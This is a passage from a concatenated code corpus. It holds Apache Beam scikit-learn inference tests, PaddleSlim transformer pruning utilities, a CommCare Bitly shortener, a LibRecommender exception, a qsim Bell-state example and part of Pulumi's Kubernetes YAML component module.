def test_env_vars_set_correctly_numpy(self):
temp_file_name = self.tmpdir + os.sep + 'pickled_file'
with open(temp_file_name, 'wb') as file:
pickle.dump(build_model(), file)
handler_with_vars = SklearnModelHandlerNumpy(
env_vars={'FOO': 'bar'}, model_uri=temp_file_name)
os.environ.pop('FOO', None)
self.assertFalse('FOO' in os.environ)
examples = [numpy.array([0, 0]), numpy.array([1, 1])]
with TestPipeline() as pipeline:
_ = (
pipeline
| 'start' >> beam.Create(examples)
| RunInference(handler_with_vars))
pipeline.run()
self.assertTrue('FOO' in os.environ)
self.assertTrue((os.environ['FOO']) == 'bar')
def test_pipeline_pandas(self):
temp_file_name = self.tmpdir + os.sep + 'pickled_file'
with open(temp_file_name, 'wb') as file:
pickle.dump(build_pandas_pipeline(), file)
with TestPipeline() as pipeline:
dataframe = pandas_dataframe()
splits = [dataframe.loc[[i]] for i in dataframe.index]
pcoll = pipeline | 'start' >> beam.Create(splits)
actual = pcoll | RunInference(
SklearnModelHandlerPandas(model_uri=temp_file_name))
expected = [
PredictionResult(splits[0], 5),
PredictionResult(splits[1], 8),
PredictionResult(splits[2], 1),
PredictionResult(splits[3], 1),
PredictionResult(splits[4], 2),
]
assert_that(
actual, equal_to(expected, equals_fn=_compare_dataframe_predictions))
def test_pipeline_pandas_env_vars_set_correctly(self):
temp_file_name = self.tmpdir + os.sep + 'pickled_file'
with open(temp_file_name, 'wb') as file:
pickle.dump(build_pandas_pipeline(), file)
handler_with_vars = SklearnModelHandlerPandas(
env_vars={'FOO': 'bar'}, model_uri=temp_file_name)
os.environ.pop('FOO', None)
self.assertFalse('FOO' in os.environ)
with TestPipeline() as pipeline:
dataframe = pandas_dataframe()
splits = [dataframe.loc[[i]] for i in dataframe.index]
_ = (
pipeline
| 'start' >> beam.Create(splits)
| RunInference(handler_with_vars))
pipeline.run()
self.assertTrue('FOO' in os.environ)
self.assertTrue((os.environ['FOO']) == 'bar')
def test_pipeline_pandas_custom_batching(self):
temp_file_name = self.tmpdir + os.sep + 'pickled_file'
with open(temp_file_name, 'wb') as file:
pickle.dump(build_pandas_pipeline(), file)
def batch_validator_pandas_inference_fn(
model: BaseEstimator,
batch: Sequence[numpy.ndarray],
inference_args: Optional[Dict[str, Any]] = None) -> Any:
if len(batch) != 5:
raise Exception(
f'Expected batch of size 5, received batch of size {len(batch)}')
return _default_pandas_inference_fn(model, batch, inference_args)
with TestPipeline() as pipeline:
dataframe = pandas_dataframe()
splits = [dataframe.loc[[i]] for i in dataframe.index]
pcoll = pipeline | 'start' >> beam.Create(splits)
actual = pcoll | RunInference(
SklearnModelHandlerPandas(
model_uri=temp_file_name,
inference_fn=batch_validator_pandas_inference_fn,
min_batch_size=5,
max_batch_size=5))
expected = [
PredictionResult(splits[0], 5),
PredictionResult(splits[1], 8),
PredictionResult(splits[2], 1),
PredictionResult(splits[3], 1),
PredictionResult(splits[4], 2),
]
assert_that(
actual, equal_to(expected, equals_fn=_compare_dataframe_predictions))
def test_pipeline_pandas_large_model(self):
temp_file_name = self.tmpdir + os.sep + 'pickled_file'
with open(temp_file_name, 'wb') as file:
pickle.dump(build_pandas_pipeline(), file)
def large_model_validator_pandas_inference_fn(
model: BaseEstimator,
batch: Sequence[numpy.ndarray],
inference_args: Optional[Dict[str, Any]] = None) -> Any:
multi_process_shared_loaded = "multi_process_shared" in str(type(model))
if not multi_process_shared_loaded:
raise Exception(
f'Loaded model of type {type(model)}, was ' +
'expecting multi_process_shared_model')
return _default_pandas_inference_fn(model, batch, inference_args)
with TestPipeline() as pipeline:
dataframe = pandas_dataframe()
splits = [dataframe.loc[[i]] for i in dataframe.index]
pcoll = pipeline | 'start' >> beam.Create(splits)
actual = pcoll | RunInference(
SklearnModelHandlerPandas(
model_uri=temp_file_name,
inference_fn=large_model_validator_pandas_inference_fn,
large_model=True))
expected = [
PredictionResult(splits[0], 5),
PredictionResult(splits[1], 8),
PredictionResult(splits[2], 1),
PredictionResult(splits[3], 1),
PredictionResult(splits[4], 2),
]
assert_that(
actual, equal_to(expected, equals_fn=_compare_dataframe_predictions))
def test_pipeline_pandas_custom_inference(self):
temp_file_name = self.tmpdir + os.sep + 'pickled_file'
with open(temp_file_name, 'wb') as file:
pickle.dump(build_pandas_pipeline(), file)
with TestPipeline() as pipeline:
dataframe = pandas_dataframe()
splits = [dataframe.loc[[i]] for i in dataframe.index]
pcoll = pipeline | 'start' >> beam.Create(splits)
actual = pcoll | RunInference(
SklearnModelHandlerPandas(
model_uri=temp_file_name,
inference_fn=alternate_pandas_inference_fn))
expected = [
PredictionResult(splits[0], 4),
PredictionResult(splits[1], 7),
PredictionResult(splits[2], 0),
PredictionResult(splits[3], 0),
PredictionResult(splits[4], 1),
]
assert_that(
actual, equal_to(expected, equals_fn=_compare_dataframe_predictions))
def test_pipeline_pandas_dict_out(self):
temp_file_name = self.tmpdir + os.sep + 'pickled_file'
with open(temp_file_name, 'wb') as file:
pickle.dump(FakePandasModelDictOut(), file)
with TestPipeline() as pipeline:
dataframe = pandas_dataframe()
splits = [dataframe.loc[[i]] for i in dataframe.index]
pcoll = pipeline | 'start' >> beam.Create(splits)
actual = pcoll | RunInference(
SklearnModelHandlerPandas(model_uri=temp_file_name))
expected = [
PredictionResult(splits[0], {
'out1': 5, 'out2': 5
}),
PredictionResult(splits[1], {
'out1': 8, 'out2': 8
}),
PredictionResult(splits[2], {
'out1': 1, 'out2': 1
}),
PredictionResult(splits[3], {
'out1': 1, 'out2': 1
}),
PredictionResult(splits[4], {
'out1': 4, 'out2': 4
}),
]
assert_that(
actual, equal_to(expected, equals_fn=_compare_dataframe_predictions))
@unittest.skipIf(platform.system() == 'Windows', 'BEAM-14359')
def test_pipeline_pandas_joblib(self):
temp_file_name = self.tmpdir + os.sep + 'pickled_file'
with open(temp_file_name, 'wb') as file:
joblib.dump(build_pandas_pipeline(), file)
with TestPipeline() as pipeline:
dataframe = pandas_dataframe()
splits = [dataframe.loc[[i]] for i in dataframe.index]
pcoll = pipeline | 'start' >> beam.Create(splits)
actual = pcoll | RunInference(
SklearnModelHandlerPandas(
model_uri=temp_file_name, model_file_type=ModelFileType.JOBLIB))
expected = [
PredictionResult(splits[0], 5),
PredictionResult(splits[1], 8),
PredictionResult(splits[2], 1),
PredictionResult(splits[3], 1),
PredictionResult(splits[4], 2),
]
assert_that(
actual, equal_to(expected, equals_fn=_compare_dataframe_predictions))
def test_pipeline_pandas_with_keys(self):
temp_file_name = self.tmpdir + os.sep + 'pickled_file'
with open(temp_file_name, 'wb') as file:
pickle.dump(build_pandas_pipeline(), file)
with TestPipeline() as pipeline:
data_frame = pandas_dataframe()
keys = [str(i) for i in range(5)]
splits = [data_frame.loc[[i]] for i in data_frame.index]
keyed_rows = [(key, value) for key, value in zip(keys, splits)]
pcoll = pipeline | 'start' >> beam.Create(keyed_rows)
actual = pcoll | RunInference(
KeyedModelHandler(
SklearnModelHandlerPandas(model_uri=temp_file_name)))
expected = [
('0', PredictionResult(splits[0], 5)),
('1', PredictionResult(splits[1], 8)),
('2', PredictionResult(splits[2], 1)),
('3', PredictionResult(splits[3], 1)),
('4', PredictionResult(splits[4], 2)),
]
assert_that(
actual, equal_to(expected, equals_fn=_compare_dataframe_predictions))
def test_infer_too_many_rows_in_dataframe(self):
with self.assertRaisesRegex(
ValueError, r'Only dataframes with single rows are supported'):
data_frame_too_many_rows = pandas_dataframe()
fake_model = FakeModel()
inference_runner = SklearnModelHandlerPandas(model_uri='unused')
inference_runner.run_inference([data_frame_too_many_rows], fake_model)
if __name__ == '__main__':
unittest.main()
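A condensed, standalone version of the pattern these tests exercise, using only the public pieces imported above; ``'model.pkl'`` is a placeholder path to a pickled scikit-learn model:

    import apache_beam as beam
    import numpy
    from apache_beam.ml.inference.base import RunInference
    from apache_beam.ml.inference.sklearn_inference import SklearnModelHandlerNumpy

    with beam.Pipeline() as pipeline:
        _ = (
            pipeline
            | beam.Create([numpy.array([0, 0]), numpy.array([1, 1])])
            | RunInference(SklearnModelHandlerNumpy(model_uri='model.pkl'))
            | beam.Map(print))  # each element is a PredictionResult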
|
6b59cf2972ac1a05d6287e98a143e7e977f30dea
|
b04cc98a746d1df457183bc14908094a8be00ba1
|
/paddleslim/nas/ofa/utils/nlp_utils.py
|
88c167ff0cf98ec4cfbb9b6f6fb0308095931752
|
[
"Apache-2.0"
] |
permissive
|
PaddlePaddle/PaddleSlim
|
a3bcaef0c92016b7f6946d58787f87c7db8ff3f8
|
bb02b103a89a09635941bc0bbbd38506d7412468
|
refs/heads/develop
| 2023-08-31T01:47:27.824722
| 2023-08-25T08:06:08
| 2023-08-25T08:06:08
| 228,290,594
| 1,534
| 402
|
Apache-2.0
| 2023-08-29T09:37:55
| 2019-12-16T02:56:50
|
Python
|
UTF-8
|
Python
| false
| false
| 11,436
|
py
|
nlp_utils.py
|
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import numpy as np
import paddle
__all__ = ["compute_neuron_head_importance", "reorder_head", "reorder_neuron"]
def compute_neuron_head_importance(task_name,
model,
data_loader,
num_layers,
num_heads,
loss_fct=paddle.nn.loss.CrossEntropyLoss(),
intermediate_name='linear1',
output_name='linear2'):
"""
Compute the importance of the multi-head-attention heads and feed-forward neurons in each transformer layer.
Args:
task_name(str): task name.
model(paddle.nn.Layer): the instance of transformer model.
data_loader(DataLoader): An iterable data loader is used for evaluate. An instance of `paddle.io.Dataloader`.
num_layers(int): number of transformer layers.
num_heads(int): number of heads in each multi-head attention.
loss_fct(Loss|optional): loss function can be a `paddle.nn.Layer` instance. Default: `nn.loss.CrossEntropyLoss()`.
intermediate_name(str|optional): the name of intermediate `Linear` layer in feed-forward. Default: `linear1`.
output_name(str|optional): the name of output `Linear` layer in feed-forward. Default: `linear2`.
"""
head_importance = paddle.zeros(
shape=[num_layers, num_heads], dtype='float32')
head_mask = paddle.ones(shape=[num_layers, num_heads], dtype='float32')
head_mask.stop_gradient = False
intermediate_weight = []
intermediate_bias = []
output_weight = []
for name, w in model.named_parameters():
if intermediate_name in name:
if len(w.shape) > 1:
intermediate_weight.append(w)
else:
intermediate_bias.append(w)
if output_name in name:
if len(w.shape) > 1:
output_weight.append(w)
neuron_importance = []
for w in intermediate_weight:
neuron_importance.append(np.zeros(shape=[w.shape[1]], dtype='float32'))
if task_name.lower() != 'mnli':
data_loader = (data_loader, )
for data in data_loader:
for batch in data:
if isinstance(batch, dict):
input_ids, segment_ids, labels = batch['input_ids'], batch[
'token_type_ids'], batch['labels']
else:
input_ids, segment_ids, labels = batch
logits = model(
input_ids, segment_ids, attention_mask=[None, head_mask])
loss = loss_fct(logits, labels)
loss.backward()
head_importance += paddle.abs(
paddle.to_tensor(head_mask.gradient()))
for w1, b1, w2, current_importance in zip(
intermediate_weight, intermediate_bias, output_weight,
neuron_importance):
current_importance += np.abs(
(np.sum(w1.numpy() * w1.gradient(), axis=0) + b1.numpy() *
b1.gradient()))
current_importance += np.abs(
np.sum(w2.numpy() * w2.gradient(), axis=1))
return head_importance, neuron_importance
def reorder_head(layer, index):
"""
Reorder head weights according to the given index.
Args:
layer(paddle.nn.Layer): the instance of `paddle.nn.MultiHeadAttention` layer.
index(list): the sorted indices of the attention heads.
"""
assert isinstance(layer, paddle.nn.MultiHeadAttention), \
"layer in reorder_head must be the instance of `paddle.nn.MultiHeadAttention`."
n, a = layer.num_heads, layer.head_dim
idx = paddle.reshape(
paddle.index_select(
paddle.reshape(
paddle.arange(
0, n * a, dtype='int64'), shape=[n, a]),
index=index,
axis=0),
shape=[-1])
def reorder_head_matrix(linearLayer, index, dim=1):
W = paddle.index_select(linearLayer.weight, index, axis=dim).detach()
if linearLayer.bias is not None:
if dim == 0:
b = paddle.assign(linearLayer.bias).detach()
else:
b = paddle.assign(
paddle.index_select(
linearLayer.bias, index, axis=0)).detach()
linearLayer.weight.stop_gradient = True
linearLayer.weight.set_value(W)
linearLayer.weight.stop_gradient = False
if linearLayer.bias is not None:
linearLayer.bias.stop_gradient = True
linearLayer.bias.set_value(b)
linearLayer.bias.stop_gradient = False
reorder_head_matrix(
layer.q_proj.fn if hasattr(layer.q_proj, 'fn') else layer.q_proj, idx)
reorder_head_matrix(
layer.k_proj.fn if hasattr(layer.k_proj, 'fn') else layer.k_proj, idx)
reorder_head_matrix(
layer.v_proj.fn if hasattr(layer.v_proj, 'fn') else layer.v_proj, idx)
reorder_head_matrix(
layer.out_proj.fn if hasattr(layer.out_proj, 'fn') else layer.out_proj,
idx,
dim=0)
def reorder_neuron(layer, index, dim=0):
"""
Reorder feed-forward weights according to the given index.
Args:
layer(paddle.nn.Layer): the instance of `paddle.nn.Linear` layer.
index(list): the sorted indices of the feed-forward neurons.
dim(int): the weight dimension along which to select.
"""
linearLayer = layer.fn if hasattr(layer, 'fn') else layer
W = paddle.index_select(linearLayer.weight, index, axis=dim).detach()
if linearLayer.bias is not None:
if dim == 0:
b = paddle.assign(linearLayer.bias).detach()
else:
b = paddle.assign(
paddle.index_select(
linearLayer.bias, index, axis=0)).detach()
linearLayer.weight.stop_gradient = True
linearLayer.weight.set_value(W)
linearLayer.weight.stop_gradient = False
if linearLayer.bias is not None:
linearLayer.bias.stop_gradient = True
linearLayer.bias.set_value(b)
linearLayer.bias.stop_gradient = False
### monkey patch for MultiHeadAttention _prepare_qkv to change num_heads.
def _prepare_qkv(self, query, key, value, cache=None):
q = self.q_proj(query)
if hasattr(self.q_proj,
'fn') and self.q_proj.fn.cur_config['expand_ratio'] != None:
self.num_heads = int(self.num_heads *
self.q_proj.fn.cur_config['expand_ratio'])
q = paddle.reshape(x=q, shape=[0, 0, self.num_heads, self.head_dim])
q = paddle.transpose(x=q, perm=[0, 2, 1, 3])
if isinstance(cache, self.StaticCache):
# for encoder-decoder attention in inference with cached key/value
k, v = cache.k, cache.v
else:
k, v = self.compute_kv(key, value)
if isinstance(cache, self.Cache):
# for decoder self-attention in inference
k = paddle.concat([cache.k, k], axis=2)
v = paddle.concat([cache.v, v], axis=2)
cache = self.Cache(k, v)
return (q, k, v) if cache is None else (q, k, v, cache)
### monkey patch for MultiHeadAttention forward to accept head_mask
### attn_mask[0] = attn_mask, attn_mask[1] = head_mask
def _mha_forward(self, query, key, value, attn_mask=None, cache=None):
key = query if key is None else key
value = query if value is None else value
# compute q ,k ,v
if cache is None:
q, k, v = self._prepare_qkv(query, key, value, cache)
else:
q, k, v, cache = self._prepare_qkv(query, key, value, cache)
# scale dot product attention
# TODO: use paddle.matmul, however it doesn't support `alpha`
product = paddle.matmul(x=q, y=k, transpose_y=True)
if attn_mask[0] is not None:
# TODO(guosheng): support bool mask
product = product + attn_mask[0]
weights = paddle.nn.functional.softmax(product)
if self.dropout:
weights = paddle.nn.functional.dropout(
weights,
self.dropout,
training=self.training,
mode="upscale_in_train")
if attn_mask[1] is not None:
weights = weights * attn_mask[1]
out = paddle.matmul(weights, v)
# combine heads
out = paddle.transpose(out, perm=[0, 2, 1, 3])
out = paddle.reshape(x=out, shape=[0, 0, out.shape[2] * out.shape[3]])
# project to output
out = self.out_proj(out)
outs = [out]
if self.need_weights:
outs.append(weights)
if cache is not None:
outs.append(cache)
if hasattr(self.q_proj,
'fn') and self.q_proj.fn.cur_config['expand_ratio'] != None:
self.num_heads = int(
float(self.num_heads) / self.q_proj.fn.cur_config['expand_ratio'])
return out if len(outs) == 1 else tuple(outs)
### monkey patch for TransformerEncoder forward to accept head_mask
### attn_mask[0] = attn_mask, attn_mask[1] = head_mask
def _encoder_forward(self, src, src_mask=[None, None]):
output = src
if src_mask[1] is not None:
head_mask = src_mask[1]
if len(head_mask.shape) == 1:
head_mask = paddle.unsqueeze(
paddle.unsqueeze(
paddle.unsqueeze(paddle.unsqueeze(head_mask, 0), 0), -1),
-1)
head_mask = paddle.expand(
head_mask, shape=[self.num_layers] + head_mask.shape[1:])
elif len(head_mask.shape) == 2:
head_mask = paddle.unsqueeze(
paddle.unsqueeze(paddle.unsqueeze(head_mask, 1), -1), -1)
else:
head_mask = [None] * self.num_layers
for i, mod in enumerate(self.layers):
output = mod(output, src_mask=[src_mask[0], head_mask[i]])
if self.norm is not None:
output = self.norm(output)
return output
def _encoder_layer_forward(self, src, src_mask=None, cache=None):
residual = src
if self.normalize_before:
src = self.norm1(src)
# Add cache for encoder for the usage like UniLM
if cache is None:
src = self.self_attn(src, src, src, src_mask)
else:
src, incremental_cache = self.self_attn(src, src, src, src_mask, cache)
src = residual + self.dropout1(src)
if not self.normalize_before:
src = self.norm1(src)
residual = src
if self.normalize_before:
src = self.norm2(src)
src = self.linear2(self.dropout(self.activation(self.linear1(src))))
src = residual + self.dropout2(src)
if not self.normalize_before:
src = self.norm2(src)
return src if cache is None else (src, incremental_cache)
paddle.nn.MultiHeadAttention.forward = _mha_forward
paddle.nn.MultiHeadAttention._prepare_qkv = _prepare_qkv
paddle.nn.TransformerEncoder.forward = _encoder_forward
paddle.nn.TransformerEncoderLayer.forward = _encoder_layer_forward
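A hedged usage sketch for the helpers above; ``model``, ``data_loader`` and the ``model.encoder.layers`` layout are assumptions about the caller's transformer and are not defined in this module:

    import paddle

    head_imp, neuron_imp = compute_neuron_head_importance(
        task_name='sst-2', model=model, data_loader=data_loader,
        num_layers=12, num_heads=12)
    for i, enc_layer in enumerate(model.encoder.layers):  # assumed attribute path
        # put the most important heads and neurons first
        head_idx = paddle.argsort(head_imp[i], descending=True)
        reorder_head(enc_layer.self_attn, head_idx)
        neuron_idx = paddle.argsort(
            paddle.to_tensor(neuron_imp[i]), descending=True)
        reorder_neuron(enc_layer.linear1, neuron_idx, dim=1)  # FFN input projection columns
        reorder_neuron(enc_layer.linear2, neuron_idx, dim=0)  # FFN output projection rows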
|
d50aafb71c102198bd604c1b73139093c3feb9fa
|
578db86c51d44ebddd0dc7b1738985b3dc69eb74
|
/corehq/util/bitly.py
|
77cd18a9b56380eb87dfce61dbddb524d8293a11
|
[
"BSD-3-Clause"
] |
permissive
|
dimagi/commcare-hq
|
a43c7dd32b5f89c89fd5aa1b1359ab7301f4ff6b
|
e7391ddae1af1dbf118211ecb52c83fc508aa656
|
refs/heads/master
| 2023-08-16T22:38:27.853437
| 2023-08-16T19:07:19
| 2023-08-16T19:07:19
| 247,278
| 499
| 203
|
BSD-3-Clause
| 2023-09-14T19:03:24
| 2009-07-09T17:00:07
|
Python
|
UTF-8
|
Python
| false
| false
| 1,776
|
py
|
bitly.py
|
import json
import warnings
from functools import partial
from django.conf import settings
import requests
from requests import HTTPError
from six.moves.urllib.request import urlopen
BITLY_CONFIGURED = False
class BitlyError(Exception):
def __init__(self, status_code, status_txt):
self.status_code = status_code
self.status_txt = status_txt
def __str__(self):
return "Bitly Error %s: %s" % (self.status_code, self.status_txt)
def shorten_v3(url, login, api_key):
response = json.load(
urlopen("http://api.bit.ly/v3/shorten?login=%s&apiKey=%s&longUrl=%s" % (login, api_key, url))
)
if not response['data']:
raise BitlyError(response['status_code'], response['status_txt'])
return response['data']['url']
def shorten_v4(url, oauth_token):
response = requests.post("https://api-ssl.bitly.com/v4/shorten", json={"long_url": url}, headers={
'Authorization': f'Bearer {oauth_token}',
'Content-Type': 'application/json'
})
data = response.json()
try:
response.raise_for_status()
except HTTPError:
raise BitlyError(response.status_code, data.get('description', 'unknown'))
return data['link']
if getattr(settings, 'BITLY_OAUTH_TOKEN', None):
shorten = partial(shorten_v4, oauth_token=settings.BITLY_OAUTH_TOKEN)
BITLY_CONFIGURED = True
elif getattr(settings, 'BITLY_LOGIN', None) and getattr(settings, 'BITLY_APIKEY', None):
warnings.warn(
"V3 Bitly API in use. Please upgrade to V4 by setting 'BITLY_OAUTH_TOKEN' in settings",
DeprecationWarning
)
shorten = partial(shorten_v3, login=settings.BITLY_LOGIN, api_key=settings.BITLY_APIKEY)
BITLY_CONFIGURED = True
else:
def shorten(url):
return url
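A minimal usage sketch of the module-level API above; the long URL is a placeholder and ``corehq.util.bitly`` is the import path implied by this file's location (a configured Django settings module is assumed):

    from corehq.util import bitly

    long_url = 'https://example.com/some/very/long/report/link'
    try:
        short_url = bitly.shorten(long_url)  # identity no-op when Bitly is not configured
    except bitly.BitlyError:
        short_url = long_url                 # fall back to the unshortened link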
|
a2494cd31fdb5a1a59b6a67bdc3adf3d6b0d910b
|
2f1e3f24f2798507c9eb73185a955c9bfb735140
|
/libreco/utils/exception.py
|
c54c333d648b7f8ba6805455085014e862f3dcc6
|
[
"MIT"
] |
permissive
|
massquantity/LibRecommender
|
e4f55b06b2208c794a3f97f7ff89413fa9beaffa
|
8d5fbe9c177f5b91c2b6f19a155a83320dd0e20c
|
refs/heads/master
| 2023-08-31T23:48:37.634663
| 2023-08-20T11:58:15
| 2023-08-20T11:58:15
| 174,493,761
| 251
| 55
|
MIT
| 2023-08-20T11:58:16
| 2019-03-08T07:58:27
|
Python
|
UTF-8
|
Python
| false
| false
| 319
|
py
|
exception.py
|
class NotSamplingError(Exception):
"""Exception related to sampling data
If the client wants to use batch_sampling and then evaluate on the dataset,
but forgot to do whole-data sampling beforehand, this exception will be
raised, because in that case the unsampled data can't be evaluated.
"""
pass
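

# Hedged illustration (not part of the library): a typical guard that raises
# NotSamplingError. The ``data`` argument and its ``has_sampled`` attribute are
# assumptions made for this example only.
def _ensure_sampled(data):
    if not getattr(data, "has_sampled", False):
        raise NotSamplingError(
            "Whole-data sampling must be done before evaluation; "
            "run the sampling step on the full dataset first."
        )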
/docs/tutorials/multinode/noiseless3.py | quantumlib/qsim | Apache-2.0
import cirq, qsimcirq
# Create a Bell state, |00) + |11)
q0, q1 = cirq.LineQubit.range(2)
circuit = cirq.Circuit(cirq.H(q0), cirq.CNOT(q0, q1), cirq.measure(q0, q1, key="m"))
sim = qsimcirq.QSimSimulator()
result = sim.run(circuit, repetitions=1000)
# Outputs a histogram dict of result:count pairs.
# Expected result is a bunch of 0s and 3s, with no 1s or 2s.
print(result.histogram(key="m"))
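
# Hedged follow-up sketch (not part of the original tutorial): with the
# measurement keyed on (q0, q1), histogram keys 0 and 3 correspond to |00) and
# |11); observing 1 or 2 would mean the qubits were not correlated as expected.
hist = result.histogram(key="m")
assert set(hist.keys()) <= {0, 3}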
/sdk/python/pulumi_kubernetes/yaml/yaml.py | pulumi/pulumi-kubernetes | Apache-2.0
# *** WARNING: this file was generated by the Pulumi Kubernetes codegen tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import json
import warnings
from copy import copy
from glob import glob
from inspect import getfullargspec, ismethod
from typing import Any, Callable, List, Mapping, Optional, Sequence
import pulumi
import pulumi.runtime
import requests
from pulumi_kubernetes.apiextensions import CustomResource
from .. import _utilities, _tables
__all__ = ['ConfigFile', 'ConfigGroup']
class ConfigGroup(pulumi.ComponentResource):
resources: pulumi.Output[dict]
"""
Kubernetes resources contained in this ConfigGroup.
"""
def __init__(self,
name: str,
files: Optional[Sequence[str]] = None,
yaml: Optional[Sequence[str]] = None,
opts: Optional[pulumi.ResourceOptions] = None,
transformations: Optional[Sequence[Callable[[Any, pulumi.ResourceOptions], None]]] = None,
resource_prefix: Optional[str] = None,
skip_await: Optional[bool] = None):
"""
ConfigGroup creates a set of Kubernetes resources from Kubernetes YAML text. The YAML text
may be supplied using any of the following methods:
1. Using a filename or a list of filenames:
2. Using a file pattern or a list of file patterns:
3. Using a literal string containing YAML, or a list of such strings:
4. Any combination of files, patterns, or YAML strings:
## Example Usage
### Local File
```python
from pulumi_kubernetes.yaml import ConfigGroup
example = ConfigGroup(
"example",
files=["foo.yaml"],
)
```
### Multiple Local File
```python
from pulumi_kubernetes.yaml import ConfigGroup
example = ConfigGroup(
"example",
files=["foo.yaml", "bar.yaml"],
)
```
### Local File Pattern
```python
from pulumi_kubernetes.yaml import ConfigGroup
example = ConfigGroup(
"example",
files=["yaml/*.yaml"],
)
```
### Multiple Local File Patterns
```python
from pulumi_kubernetes.yaml import ConfigGroup
example = ConfigGroup(
"example",
files=["foo/*.yaml", "bar/*.yaml"],
)
```
### Literal YAML String
```python
from pulumi_kubernetes.yaml import ConfigGroup
example = ConfigGroup(
"example",
yaml=['''
apiVersion: v1
kind: Namespace
metadata:
name: foo
''']
)
```
### YAML with Transformations
```python
from pulumi_kubernetes.yaml import ConfigGroup
# Make every service private to the cluster, i.e., turn all services into ClusterIP instead of LoadBalancer.
def make_service_private(obj, opts):
if obj["kind"] == "Service" and obj["apiVersion"] == "v1":
try:
t = obj["spec"]["type"]
if t == "LoadBalancer":
obj["spec"]["type"] = "ClusterIP"
except KeyError:
pass
# Set a resource alias for a previous name.
def alias(obj, opts):
if obj["kind"] == "Deployment":
opts.aliases = ["oldName"]
# Omit a resource from the Chart by transforming the specified resource definition to an empty List.
def omit_resource(obj, opts):
if obj["kind"] == "Pod" and obj["metadata"]["name"] == "test":
obj["apiVersion"] = "v1"
obj["kind"] = "List"
example = ConfigGroup(
"example",
files=["foo.yaml"],
transformations=[make_service_private, alias, omit_resource],
)
```
:param str name: A name for a resource.
:param Optional[Sequence[str]] files: Set of paths or a URLs that uniquely identify files.
:param Optional[Sequence[str]] yaml: YAML text containing Kubernetes resource definitions.
:param Optional[pulumi.ResourceOptions] opts: A bag of optional settings that control a resource's behavior.
:param Optional[Sequence[Callable[[Any, pulumi.ResourceOptions], None]]] transformations: A set of
transformations to apply to Kubernetes resource definitions before registering with engine.
:param Optional[str] resource_prefix: An optional prefix for the auto-generated resource names.
Example: A resource created with resource_prefix="foo" would produce a resource named "foo-resourceName".
:param Optional[bool] skip_await: Skip await logic for all resources in this YAML. Resources will be marked
ready as soon as they are created. Warning: This option should not be used if you have resources
depending on Outputs from the YAML.
"""
if not name:
raise TypeError('Missing resource name argument (for URN creation)')
if not isinstance(name, str):
raise TypeError('Expected resource name to be a string')
if opts and not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if not files:
files = []
if not yaml:
yaml = []
__props__ = dict()
if resource_prefix:
name = f"{resource_prefix}-{name}"
super(ConfigGroup, self).__init__(
"kubernetes:yaml:ConfigGroup",
name,
__props__,
opts)
self.resources = pulumi.Output.from_input({})
transformations = transformations if transformations is not None else []
if skip_await:
transformations.append(_skip_await)
_files: List[str] = []
for file in files:
if _is_url(file):
_files.append(file)
else:
_files += [f for f in glob(file)]
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(parent=self))
for file in _files:
cf = ConfigFile(
file, file_id=file, transformations=transformations, resource_prefix=resource_prefix, opts=opts)
# Add any new ConfigFile resources to the ConfigGroup's resources
self.resources = pulumi.Output.all(cf.resources, self.resources).apply(lambda x: {**x[0], **x[1]})
for text in yaml:
# Rather than using the default provider for the following invoke call, use the version specified
# in package.json.
invoke_opts = pulumi.InvokeOptions(version=_utilities.get_version(),
provider=opts.provider if opts.provider else None)
__ret__ = invoke_yaml_decode(text, invoke_opts)
resources = _parse_yaml_document(__ret__, opts, transformations, resource_prefix)
# Add any new YAML resources to the ConfigGroup's resources
self.resources = pulumi.Output.all(resources, self.resources).apply(lambda x: {**x[0], **x[1]})
# Note: Unlike NodeJS, Python requires that we "pull" on our futures in order to get them scheduled for
# execution. In order to do this, we leverage the engine's RegisterResourceOutputs to wait for the
# resolution of all resources that this YAML document created.
self.register_outputs({"resources": self.resources})
def translate_output_property(self, prop: str) -> str:
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
def translate_input_property(self, prop: str) -> str:
return _tables.SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
def get_resource(self,
group_version_kind: str,
name: str,
namespace: Optional[str] = None) -> pulumi.Output[pulumi.CustomResource]:
"""
get_resource returns a resource defined by a built-in Kubernetes group/version/kind and
name. For example: `get_resource("apps/v1/Deployment", "nginx")`
:param str group_version_kind: Group/Version/Kind of the resource, e.g., `apps/v1/Deployment`
:param str name: Name of the resource to retrieve
:param Optional[str] namespace: Optional namespace of the resource to retrieve
"""
# `id` will either be `${name}` or `${namespace}/${name}`.
id = pulumi.Output.from_input(name)
if namespace is not None:
id = pulumi.Output.concat(namespace, '/', name)
resource_id = id.apply(lambda x: f'{group_version_kind}:{x}')
return resource_id.apply(lambda x: self.resources[x])
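

def _example_config_group_lookup():
    # Hedged usage sketch (not part of the generated source): build a
    # ConfigGroup from a local file and look up one of its resources.
    # "example", "foo.yaml" and "nginx" are assumed names.
    cfg = ConfigGroup("example", files=["foo.yaml"])
    return cfg.get_resource("apps/v1/Deployment", "nginx")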
class ConfigFile(pulumi.ComponentResource):
resources: pulumi.Output[dict]
"""
Kubernetes resources contained in this ConfigFile.
"""
def __init__(self,
name: str,
file: Optional[str] = None,
opts: Optional[pulumi.ResourceOptions] = None,
transformations: Optional[Sequence[Callable[[Any, pulumi.ResourceOptions], None]]] = None,
resource_prefix: Optional[str] = None,
file_id: Optional[str] = None,
skip_await: Optional[bool] = None):
"""
ConfigFile creates a set of Kubernetes resources from a Kubernetes YAML file.
## Example Usage
### Local File
```python
from pulumi_kubernetes.yaml import ConfigFile
example = ConfigFile(
"example",
file="foo.yaml",
)
```
### YAML with Transformations
```python
from pulumi_kubernetes.yaml import ConfigFile
# Make every service private to the cluster, i.e., turn all services into ClusterIP instead of LoadBalancer.
def make_service_private(obj, opts):
if obj["kind"] == "Service" and obj["apiVersion"] == "v1":
try:
t = obj["spec"]["type"]
if t == "LoadBalancer":
obj["spec"]["type"] = "ClusterIP"
